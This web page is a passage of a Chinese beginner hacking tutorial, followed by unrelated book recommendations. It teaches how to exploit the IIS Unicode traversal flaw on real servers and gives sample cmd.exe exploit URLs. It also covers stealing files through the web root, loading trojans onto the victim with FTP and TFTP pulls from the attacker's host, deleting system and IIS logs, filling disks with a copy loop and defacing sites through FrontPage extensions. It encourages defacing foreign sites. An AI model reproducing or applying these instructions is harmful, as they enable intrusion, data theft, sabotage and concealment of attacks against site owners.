登陆注册
178000000007

黑客初级技术讲解(下续三)

基础知识(3)

上传,这个我们后面介绍。

几点忠告:

1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德

2,echo前记得帮他们做好备份

3,不准在主页里加入恶性语句

2,下载文件

要是有什么有用的文件被你发现,那我们如何下载呢?

最简单的方法:把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后,下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。

别的方法:对不起,没想好:)

3,最重要的上传

一般方法:ftp法

首先建一个ftp脚本文件:c:\hehe.haha(名字乱取把),申请一个ftp账号,然后用echo吧

echo+open ftp.cshu.com(ftp主机) > c:\hehe.haha

echo+user yourname >> cc:\hehe.haha (yourname是用户名)

echo+yourpasswd >> c:\hehe.haha (yourpasswd是密码)

echo+get setup.exe >> c:\hehe.haha 要下载的文件

echo+quit >> c:\hehe.haha

完了以后:ftp+/s:c:\hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe就会出现在当前目录了(也就是cmd所在目录)

别忘了先上传到ftp主机,不要做马大哈哦!

最简单的方法:tftp法。

这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)

在这里我推荐cisco tftp server,自己去找找把,实在没有来找我:)

安装好后运行,别忘了设置好默认目录,否则会找不到文件

tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe(ihateu.exe在默认目录里)

1.2.3.4为你的ip,用unicode运行一下,会看到tftp server里有反应了,这就好了,不一会,文件就传上去了,方便把!

学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)

4,如何清除痕迹

虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!

C:\winnt\system32\logfiles\*.*

C:\winnt\ssytem32\config\*.evt

C:\winnt\system32\dtclog\*.*

C:\winnt\system32\*.log

C:\winnt\system32\*.txt

C:\winnt\*.txt

C:\winnt\*.log

全……擦掉!

四,细节问题。

1,遇到长文件名怎么办?

c:\program files就用c:\program20%files2,遇到空格怎么办?

%代替喽,或者xx yy=xxyy~1

基础知识(5)

%代替喽,或者xx yy=xxyy~1

3,如何做个很大的文件?

目的就是破坏啦!我不喜欢不过教教你们啦

@echo off

echo big > c:\a.a

:h

copy c:\a.a+c:\a.a c:\a.a

goto h

注意不要乱来啊!

4,输入命令,没反应或反应不对。

:)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!看在你看到这里那么给我面子的份上,在给你几个吧!

http://www.exsample.com/scripts/ ... macr;..À

¯../winnt/system32/cmd.exe?/c+dir+c :\ 或 http://www.exsample.com/msadc/.. ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_vti_bin ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_mem_bin ... 2/cmd.exe?/c+dir+c:不一定有用哦!

5,如何找到unicode漏洞的主机

呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)

不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛毛,随便找个吧!

6,我copy,del文件,怎么显示aceess denined?

这个不好办了,由于unicode所拥有的权限有限,出现上述情况很正常,我们要做的便是提高自己的权限!

这个我会在今后介绍,现在你可以试试attrib

attrib -r -h -s c:\autoexec.bat

再对autoexec.bat进行操作,看看有没有效果,成功率不高,不好意思!

7,我黑了主页,天下无敌?

我本来想对你说:“见你的鬼去吧!”不过想想不大礼貌,有失我绅士风度,所以改个口

echo主页或改主页在不懂黑客的人看起来很了不起,不过,它最多算是一个基础,拿到admin才是我们的终极目标!

对cshu全体成员来说,不准去改正在建立的网页!这是我们的原则!

要是你想耍耍威风,那也可以理解,那就去黑外国的,或者url欺骗也是个好选择

8,我如何做更多的事?

第一,努力提高权限

第二,由于cmd的限制,我们可以做的不多,那就要程序帮忙,上传吧!切记,要隐秘!

一,frontpage扩展攻击。

为什么把它放第一位呢?原因很简单,它最最方便,frontpage服务器扩展是一种方便的远程站点管理功能,可是由于某些网管注意文明用语的疏忽(为什么注意文明用语满街飞?)不设置访问密码,如果那样的话,我们只要用一个frontpage就可以黑它了!!这完全不是黑客工具,但它确实办到了,还要感谢注意文明用语网管和微软啊!

具体做法:

1,准备frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。

2,找一台有frontpage扩展的主机,可以用流光,也可以用搜索引擎查找/_vti_pvt/,这是frontpage扩展的标志。

3,接下来打开frontpage,(妈妈:你在干什么?回答:做网页!妈妈:好孩子!)文件菜单下选择“打开站点”,然后在文件夹框里写入 http://11.11.22.22(我习惯用这个做例子,以...僮魍澄募恕?/a>

4,万一跳出错误信息,表示有密码(这个不算注意文明用语)这时我们试着用以下url, http://11.11.22.22/_vti_pvt/service.pwd,这...盎箍梢愿耐场?/a>

我的看法:

这个漏洞只能说明网管的疏忽,对我们而言是没有什么利用价值的,只可以改改网页,也许这也够了,但要进一步控制主机,此漏洞就无能为力。消遣时可以玩玩。

同类推荐
  • 计算机探密

    计算机探密

    黑客的精神态度是很重要的,但技术则更是重要.黑客的态度虽然是无可取代,随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变.要成为一位真正的黑客,你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言.也就是说,你必会学还了C之外的东西,你至少还要会LIS/P或Perl(Java也正在努力的挤上这个名单;译者注: 我很怀疑这份名单).除了几个重要的hacking常用语言之外,这些语言提供你一些不同的程序设计途径,并且让你在好的方法中学习.
  • 演讲的艺术
  • 孩子一生最受用的40种能力

    孩子一生最受用的40种能力

    尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!本书作者提出的40种能力,对孩子在未来生活中的竞争力是不可缺少的,并相应的为家长提供实际的方法和原则,帮助父母在家庭生活中,如何和孩子共同培养这些能力,开启孩子生命中的优势密码。能力关乎孩子的一生,可以让孩子受益一生,从小培养孩子一生最受用的40种能力,它不仅可以开发孩子的才能和潜力,使其身心得到全面成长与成熟,还能把孩子培养成一个乐观、健康、全面发展的优秀人才。
  • 看穿人心术,拿来就用

    看穿人心术,拿来就用

    如果能掌握“看穿人心术”,人与人之间的沟通会更有效。本书要为您揭晓的“秘术”有:从弦外之音看人际关系、从外表和动作看本性、听到哪些话值得注意、从口头禅看相处之道、从不同的借口洞悉性格等。只要勤加“修炼”,谁都可以更有心机和技巧地处理好人际关系,让家庭更和睦、让工作环境更舒适。尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!
热门推荐
  • 恨灵:女王之怨

    恨灵:女王之怨

    她被闺蜜无情背叛后来她才知道这一切的一切都是因为他!夜赫夜赫是她的男朋友而他也是她闺蜜的心中的真命所以她的闺蜜无情的利用任何手段想把她从这个世界上消失!终于他知道,她闺蜜是蓝狐族族长之女而她是吸血鬼界的女王。“她区区一个蓝狐族族长又能奈我何!”
  • 文明解密

    文明解密

    《我的第一本探索书
  • 偷得浮绯半生闲

    偷得浮绯半生闲

    自从苏公子的身体慢慢恢复,府里便开始有意识地放权于他,即便他确有这份能力,面对苏家偌大的产业刚开始也忙的脚不沾地。这天,苏公子不干了,甩下也没剩多少的账本,抱着自家亲亲娘子仰躺在摇椅上晒太阳,舒服的眯了眯眼:“娘子,你是神医,告诉他们我身子还虚不宜过度操劳,之前是如何以后便还是如何吧。”周围一众奴仆:“......”喂喂喂,我们听见了啊。某‘神医’挑挑眉:“我倒不知道原来你也会偷懒耍滑。”苏公子温顺的垂眸:“以前病着,阿浮陪着的时间还多些,现在好了,反而没时间了。这般本末倒置,那我倒宁愿病着。”某‘神医’忍不住心软,抚摸着她最抗拒不了的温顺大狗:“这种偷得浮生半日闲的感觉不也很好么?”苏公子微微一笑,温声道:“不,我更想要的是偷得浮绯半生闲。”被吃得死死的某‘神医’心里甜的不行,忍不住送上香吻一枚。至于最后么,你见过苏公子想办而办不成的事么?第二日,管家含泪接回账簿,算了,为了尽快有一个小主人,他就再多操劳十几年吧。
  • 逆天小宠妃:皇上,请过招!

    逆天小宠妃:皇上,请过招!

    穿越到古代的小医生,走上人生巅峰,泡上高富帅的故事。
  • 英雄瓦罗兰传说

    英雄瓦罗兰传说

    在遥远的弗雷尔卓德,寒冷的冰川之下,残破的废墟之中,那无法逃脱的宿命,从历史的洪流中,席卷重来艾希的父亲,弗雷尔卓德酋长,阿瓦罗萨族长遇袭;蛮族被毁,惨遭灭族;凛冬一族遭遇千年不遇的冰风暴.......沉寂了千年的邪恶与阴谋跨过时间,经过冰霜的洗礼,重新回到这个世界。
  • 世界奇异现象档案录

    世界奇异现象档案录

    奇异现象犹若色彩斑斓的万花筒,点缀在我们的生活中或尘封在历史中。它们时而扑朔迷离,时而迷雾重重,时而变幻莫测,时而漏出端倪。阅读过程中,它们或挑战我们的思维极限,或让我们惊呼不可思议,或超出我们想象力之外,令我们热血沸腾、欲罢不能。
  • 总裁宠妻成魔

    总裁宠妻成魔

    "这世上就没有我杨如烟偷不到的东西"某个少女从墙角下站了起来拍了手上的土不远处的车里"这世上也没有风邪得不到的""十年之前如果我没那么做你会不会爱我""如果重来一次我还是会爱你"
  • 军婚盛宠,顾少心尖宠

    军婚盛宠,顾少心尖宠

    在我手下一视同仁,十公里跑不了你说该怎么办?“老公,我身后bra扣子解不开。”“我帮你”事后“首长十公里能免了吗?”“刚刚是你作为老婆的该干的事,要不再来一次!”他宠她上天,没有她想不到,也没有他做不到。婚后,她的小蛮腰……若干年后,她说“总裁大人,我们离婚吧。”他邪笑道:“老婆,军婚不能离”【绝对宠文……男主女主身心健康】
  • 最经典的人与动物故事

    最经典的人与动物故事

    本书精选了古今中外人与动物相处的真实故事,是读者从别人的经历中近距离地观察了解动物的习性、生存状态,以及动物爱恨情仇的情感、忠诚孝义的品质、勤劳勇猛执着的性格。
  • 王俊凯之游戏罢了

    王俊凯之游戏罢了

    也许许沐不是特别好的女孩但是他愿意为王俊凯付出,也许只是这份执念才让许沐遇到了王俊凯,借他人之身,完自我心愿。只是这一味地付出终究是要有代价。双结局。(小说请勿带上真人。)